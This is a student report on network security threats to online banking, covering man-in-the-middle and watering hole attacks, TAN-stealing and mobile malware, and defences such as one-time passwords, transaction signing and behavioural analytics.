NETWORK ISSUES IN BANKING

1.MAN-IN-THE MIDDLE ATTACKS

Man-in-the-middle attacks typically are attacks on online banking systems. The
fraudster is nestling himself in the communication flow between the customer and
the bank with the aim of manipulating the transaction data to his own advantage
leaving the bank and the customer unaware. Technically speaking, man-in-themiddle attacks can take two forms:
remote man-in the-middle attacks
local man-in the-middle attacks
REMOTE MAN-IN THE-MIDDLE ATTACKS
With remote man-in-the-middle attacks, the fraudster will use a various of
techniques, such as phishing and pharming, to lure the banking customer to a rogue
website. When the banking customer logs onto his account to make a transaction,
the rogue website is obtaining the password and transaction details, such as the
beneficiarys bank account number and the monetary amount of the transaction.
The transaction details often will be altered and used by the fraudsters on the real
banking website to their financial benefit
LOCAL MAN-IN THE-MIDDLE ATTACKS
A local man-in-the-middle attack is carried out by malicious software that is
installed on the end-users computer. This software, also called spyware or
crimeware, typically infects the computer through downloads or e-mail
attachments. Once the software is installed, it tracks which websites the end-user
visits. When the crimeware detects that the end-user is visiting an online banking

website, it waits for the user to be logged on and then initiates or alters financial
transactions without the user knowing.
HOW CAN BANKS AND CUSTOMERS PROTECT THEMSELVES?
The customer should learn to behave securely when banking over the
Internet, just as he should do with other applications such as buying goods online.
It is therefore very important that the customer becomes familiar with the Internet
street smarts and be able to assess the risks involved in visiting strange websites
and downloading illegal software. He should also be decently equipped before
setting foot on the Internet, and have anti-virus, anti-spam and anti-spyware
software installed on his computer. Banks should take precautions as well, and
strengthen access control to their online banking applications by means of
authentication technology.
Strong authentication mechanisms come in two important flavors:
1. One-time passwords and
2. Electronic signatures.
One-time passwords are used for the authentication of the end-user when he
logs onto the application. One-time passwords are generated based on a variable
parameter, such as the time or a random number. They are valid for only a limited
amount of time (typically in the range of minutes) and can only be used once. The
strength of one-time passwords lies in the fact that they narrow down the window
of opportunity for a fraudster to perform an attack. Hence, it becomes more
difficult to perform fraudulent activities, especially when compared to the
possibilities to perform fraudulent action when using static passwords. One-time
passwords, however, do not provide protection against the injection of or alteration
to financial transactions. In order to resolve this problem electronic signatures

should be used. Electronic signatures, the second type of authentication

mechanism, authenticate the financial transactions. E-signatures allow the bank to
verify whether a transaction was initiated by the genuine end-user and was not
altered in transit. It prevents the fraudster from submitting transactions or
modifying existing transactions. As a result e-signatures offer the ideal security
control against both local and remote man-in-the-middle attacks.

HOW DOES IT WORK?

When the end-user wants to make a financial transaction using e-signature, a
Message Authentication Code (MAC) will be calculated over the transaction. The
calculation uses the original transaction and a secret key as input. The secret key is
something the end user shares with the bank and which is only known by them.
The result of the calculation is the so-called MAC, or e-signature. The enduser electronically submits the transaction and the corresponding MAC to the
bank. Upon receipt, the bank computes the MAC over the transaction with the
secret key. It then compares the calculated MAC with the MAC it received from
the end-user. If both are the same, the bank is sure that the genuine end-user
submitted the transaction, and that the transaction was not modified in transit. As a
result, the financial transaction can then be processed. If there is no match, the
bank knows that either a crook submitted the transaction, or the transaction data
was altered in transit. In that case, the bank rejects the transaction.

2. WATERING HOLE
Watering hole attacks are considered an evolution of spear phishing
attacks. They consist of injecting malicious code onto the public web pages of a
website that that a small group of people usually visit.
In a watering hole attack scenario, the attackers wait for victims to visit
the compromised site instead of inviting them with phishing messages. The
efficiency of the method could be increased with exploitation of zero-day
vulnerabilities in many large-use software programs such as Internet Explorer or
Adobe Flash Player.
Cyber criminals could easily compromise an improperly configured or
updated website using one of the numerous exploit kits available on the black
market. Usually attackers hack the target site months before they actually use it for
an attack.
The methods are very efficient. Its very difficult to locate a compromised
website. Watering hole is a considerably surgical attack that allows hackers to hit
only specific community, comparatively, classic phishing is less noisy. Targeting a
specific website is much more difficult than merely locating websites that contain
vulnerability. The attacker has to research and probe for a weakness on the chosen
website. Indeed, in watering hole attacks, the attackers may compromise. Once
compromised, the attackers periodically connect to the website to ensure that they
still have access Symantec One of the most interesting cases of watering hole
attacks against a financial institution was discovered in late 2012 by RSAs First
Watch research team.
The campaign was called VOHO attack, and compromised a regional bank
in Massachusetts using the tactic of crafting a watering hole. The majority of the

redirection activity occurred because of JavaScript elements on two specific

websites, one of a regional bank in Massachusetts and the other a local government
serving Washington DC suburbs:

hxxp://www.xxxxxxxxtrust.com
hxxp://xxxxxxcountymd.gov
Despite that, its unknown if this method was also used to compromise the
watering hole sites. Files found on one of the compromised websites indicate
that the server was likely compromised with a remote buffer overflow (CVE-20083869/CVE-2008-3870) against the servers sadmind daemon, giving the attacker
the ability to establish a remote shell.

Figure Watering Hole attack

Another famous watering hole attack against the banking sector was observed in
March 2013 when several South Korean banks were hit by a widespread attack that
wiped data and shut down systems. Internet banking servers went down causing an
interruption of their services, including online banking.
3.AUTOMATED ATTACKS
Financial malware comes in all shapes and sizes, and will often be tailored
to target a single organization. The way the malware operates is normally
determined by the bank's defences. This means there's no requirement for the cyber
criminals to spend time creating unnecessarily complex malware. There are several
methods which malware authors can use to get around banking security and
harvest user information. For instance, if a bank uses single-factor authentication
with a static username and passwords, it's a simple matter of capturing keystrokes.
Alternatively, some banks have created dynamic keypads so that the user needs to
click a 'random' pattern in order to enter his password. Malware authors use two
different methods to circumvent this type of security - they can either create screen
dumps when the user visits a specific site or simply gather the information being
sent to the site by grabbing the form. In both cases, the stolen data is processed
later.
The use of Transaction Authorisation Numbers (TAN) for signing
transactions makes gaining access to accounts somewhat more complex. The TAN
may come from a physical list issued to the account holder by the financial
organisation or it may be sent via SMS. In either case, the cyber criminal does not
have access to the TAN. In most cases, malware used will capture the information
entered by the user in a way similar to that described above. Once the user enters
the TAN, the malware will intercept this information and either display a fake error

message, or send an incorrect TAN to the financial site. This may result in the user
entering another TAN. An organization may require two TANS to complete a
transaction this depends on the organization and the security systems it has
decided to implement. If only one TAN is required to make a transaction, the attack
describe above could allow a cyber criminal to make two transactions.
The success of such an attack is highly dependent on the exact
implementation of the TAN system. Some systems do not set an expiry date for
TANs; it's simply a case of the next TAN on the list has to be the next TAN used. If
the next TAN on the list doesn't reach the bank's site then the criminal will be able
to either use it immediately, or save it for later use. However, stolen TANs have a
shorter lifespan than a static username and password, due to the fact that a user
who is experiencing persistent problems during an online banking session is likely
to call the bank to request assistance.
Where TANs are sent to the account holder via SMS, a unique TAN can be
issued for each unique transaction in a method somewhat similar to two-factor
authentication. From this point onward cyber criminals have to start processing
data in real-time, by using a Man-in-the-Middle attack.
4.MOBILE MALWARE
Mobile phones today are no different than standard computers so mobile
malwares are able to monitor data that is transmitted through the device to bank's
server. The additional function of mobile malwares is capability to read user's SMS
and send it to attacker's C&C server. Since many banks use OTP sent via SMS to
the mobile device to authenticate logins and transactions, with this feature attacker
can always use victim's mobile banking account since he has access to it. Attackers
are using same social engineering techniques to infect online users like convincing

them to install a newly required security application. Recently, in 2014., a new

sophisticated malware has been detected, in a malicious app "Google Service
Framework", called HijackRAT that is capable of:
Stealing and sending SMS messages (in case of re-routing OTP token
messages)
stealing contacts initiating malicious app updates
scanning for legitimate banking apps installed and replacing them
with fakes utilities
disabling any mobile security software that might be installed.
In the end, there are many other types of threats which function in the same way
with more or less advanced controls. Because of this, banking security must evolve
and some of the security options are:
Device fingerprinting: ability to look at a combination of identifiable
computer or mobile hardware/software attributes and IP address.
Transaction signing: requires the user to digitally sign each transaction
using signing solutions such as public key infrastructure (PKI).
Behavioral analytics: represents a way to detect pattern anomalies and
suspicious activities by monitoring user session.

Submitted by :
v.padmapriya(14301037)
MBA-banking technology first year